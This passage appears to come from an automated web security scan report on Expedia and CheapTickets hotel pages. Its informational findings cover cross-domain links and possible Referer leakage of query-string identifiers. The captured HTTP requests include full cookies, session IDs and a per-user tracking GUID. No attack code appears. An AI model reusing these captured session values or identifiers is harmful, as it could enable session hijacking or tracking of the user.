            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=104806&hotel.hkey=104806_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/806/104806/Holiday-Inn-Select-BOSTON-WOBURN-Hotel-Exterior-1-20110806-190117-024_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=11852&hotel.hkey=11852_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/852/11852/ESA-Boston-Braintree-Hotel-Exterior-1-20110805-191025-990_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=114000&hotel.hkey=114000_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/000/114000/BEST-WESTERN-PLUS-New-Englander-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=235019&hotel.hkey=235019_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/019/235019/The-Copley-Square-Hotel-Hotel-Exterior-13_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=35100&hotel.hkey=35100_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/100/35100/Millennium-Bostonian-Hotel-Boston-Hotel-Exterior-6_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=206519&hotel.hkey=206519_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/519/206519/Hampton-Inn-Boston-Norwood-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=209228&hotel.hkey=209228_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/228/209228/Hilton-BostonWoburn-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<li class="first"><a href="http://corp.orbitz.com" rel="nofollow">About Us</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://corp.orbitz.com/careers" rel="nofollow">Careers</a></li>
       <li><a href="http://pressroom.orbitz.com/" rel="nofollow">Media</a></li>
       <li><a href="http://corp.orbitz.com/partnerships/advertise.html" rel="nofollow">Advertising</a>
...[SNIP]...
<div class="security">
        <a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.cheaptickets.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.cheaptickets.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...

19.185. http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains. Note that the captured response is a 503 Service Temporarily Unavailable page, so the cross-domain links counted here come from the site's error template rather than from the hotel information page itself; the Referer exposure of the query string is the same either way.

Request

GET /Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; p1=`tpid=v.1,1`11; iEAPID=21187; s1=`MH=21187`EAPIsVisible=0`EAPBrandingURL=`EAPBrandingFeature=0`EAPIndustry=Other`EAPName=TripAdvisor`99

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 01:02:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:05 GMT; Path=/
Content-Length: 86924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Service Temporarily Unavailable</title>

       <link
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

19.186. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains. The query string in this request carries two GUID-shaped values, hwrqCacheKey and c; the hwrqCacheKey value is the same GUID as the MC1 tracking cookie, so any click or resource load that sends this URL as the Referer hands a per-user identifier to the linked third-party domains.

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...
<noscript>
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u16=USD;u13=4215;u14=429;u11=35;u9=The Boston Park Plaza Hotel & Towers;u7=1|0;u6=1;u4=20111004|20111007;u1=Hotel;u2=178239;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript>                                                                                
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u1=Hotel;u4=20111004|20111007;u2=178239;u6=1;u7=1|0;u9=The Boston Park Plaza Hotel & Towers;u11=35;u13=4215;u14=429;u16=USD;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
</span>
   <img id="staticMap_image" src="http://maps.google.com/staticmap?client=gme-expedia&size=192x136&zoom=14&sensor=false&format=png8&markers=42.35080,-71.07032,red|" width="192" height="136" onload="YAHOO.cx.exp.widget.infosite.StaticMap.showMap()" alt="MAP" />
</div>
...[SNIP]...
<div id="infosite_opinionLab-container">
   <a id="nav-tool-feedback" class="xp-t-bold" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" href="https://secure.opinionlab.com/ccc01/comment_card.asp" target="_top" rel="nofollow">
       Give your feedback to help us make improvements
   </a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

19.187. http://www.expedia.com/Hotel-Search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

